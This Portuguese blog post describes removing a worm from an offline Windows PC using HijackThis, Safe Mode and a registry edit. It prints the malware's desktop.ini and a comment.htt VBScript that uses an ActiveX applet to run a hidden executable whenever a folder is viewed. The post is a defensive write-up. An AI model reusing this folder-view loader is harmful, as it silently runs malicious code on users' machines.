Ficheiros nocivos

Tenho um computador que, como não está ligado à net, achei desnecessária a instalação de software de antivírus. No entanto, acabou infectado por um worm. Este malware foi instalado no sistema devido ao meu reduzido conhecimento do assunto.

Existem vírus que consistem em ficheiros cujo ícone é o mesmo de uma directoria. Este pormenor é suficiente para enganar a maioria dos incautos. Mesmo assim, talvez não me incomodasse muito se fosse um worm silencioso. Mas não o era. Reiniciava-me o computador sempre que tentava aceder à linha de  comandos o que, para mim era inadmissível (ainda prefiro a linha de  comandos em muitas situações).

Comecei por instalar e correr o hijackthis que permite fazer um diagnóstico ao sistema. Sempre que tentava correr este programa, o computador era reinicado. Tive mesmo de corrê-lo em modo de segurança com linha de comandos (mesmo o outro modo não era suficiente). Para inciar o windows em modo de segurança basta pressionar a tecla F2 antes deste começar a arrancar. Não me foi muito complicado ver quais eram as entradas do registry contaminadas e utilizar o hijackthis para corrigi-las.

Restava-me limpar o disco dos ficheiros maléficos. Pensava eu, ser uma tarefa simples… estava enganado. Sabia que os ficheiros deveriam estar ocultos e tentei torná-los visíveis. Mas para tornar os ficheiros visíveis, vai-se ao menu Toos/Options na janela do explorer e seleciona-se o campo Show hidden files and folders. Para minha surpresa, esse menu estava indisponível. Aí tive de voltar à linha de comandos do velho DOS (desta vez não reiniciava graças à limpeza do hijackthis) e usar o famoso comando

dir /a
REM dir/a mostra todos os ficheiros, incluindo os ficheiros ocultos

Procurei e eliminei os ficheiros nocivos diagnosticados no registry pelo hijackthis das directorias em causa. Enquanto o fazia, encontro, em muitas directorias, ficheiros com extensão .htt e outros com o nome desktop.ini. Editei o ficheiro desktop.ini da raíz com o edit e este continha o seguinte:

[.ShellClassInfo]
hTMLInfoTipFile=file://Comment.htt
ConfirmFileOp=0

Na mesma directoria encontro o ficheiro comment.htt com o seguinte conteúdo (nota: o código deste ficheiro é usado por sites não fidedignos e ainda pode consistir numa falha de segurança do windows):

<body><html><body>
<script language="vbscript">

document.write(‘<div style="position:absolute;left:0px;right:0px;width:0px;height:0px;z-index:28;visibility:hidden"><applet name="applet_name"
code="com.ms.activeX.ActiveXComponent">
</applet></div>’
)
</script>
<script language="vbscript">

On Error Resume Next
Dim
Path, Win
Path=""
Win=""
Path=Left(document.location,Len(document.location)-11)
Path=Mid(Path,9)
Set AppleObject(document.applets("applet_name")
AppleObjet.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
Set wsShell=AppleObject.GetObject()
wsShell.run(Path+"executavel.exe")
</script>
</body></html></body>

Repare-se que este script utiliza uma applet que corre código dos vários componentes activeX, nomeadamente da classe com.ms.activeX.ActiveXComponent. Neste caso, usa esse código para  correr um programa nocivo que lá se encontra. Claramente, eliminei estes ficheiros do disco em todas as directorias que os encontrei. O explorer utiliza o desktop.ini para configurar a forma como as directorias aparecem e como dispõe a informação, correndo o script do ficheiro htt neste caso.

Para habilitar o menu Toos/Options é necessário editar a tabela do registry com o regedit.exe e colocar o valor 0 no campo

HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionPolicesExplorerNoFolderOptions

Deixou aqui o alerta de que a alteração à toa dos campos do registry pode ter consequências catastróficas no sistema operativo.

Sobre Sérgio O. Marques

Licenciado em Física/Matemática Aplicada (Astronomia) pela Faculdade de Ciências da Universidade do Porto e Mestre em Matemática Aplicada pela mesma instituição, desenvolvo trabalho no PTC (Porto Technical Centre) - Yazaki como Administrador de bases-de-dados. Dentro o meu leque de interesses encontram-se todos os temas afins às disciplinas de Matemática, Física e Astronomia. Porém, como entusiasta, interesso-me por temas relacionados com electrónica, poesia, música e fotografia.
Esta entrada foi publicada em Computadores e Internet. ligação permanente.

Deixe uma Resposta

Preencha os seus detalhes abaixo ou clique num ícone para iniciar sessão:

Logótipo da WordPress.com

Está a comentar usando a sua conta WordPress.com Terminar Sessão / Alterar )

Imagem do Twitter

Está a comentar usando a sua conta Twitter Terminar Sessão / Alterar )

Facebook photo

Está a comentar usando a sua conta Facebook Terminar Sessão / Alterar )

Google+ photo

Está a comentar usando a sua conta Google+ Terminar Sessão / Alterar )

Connecting to %s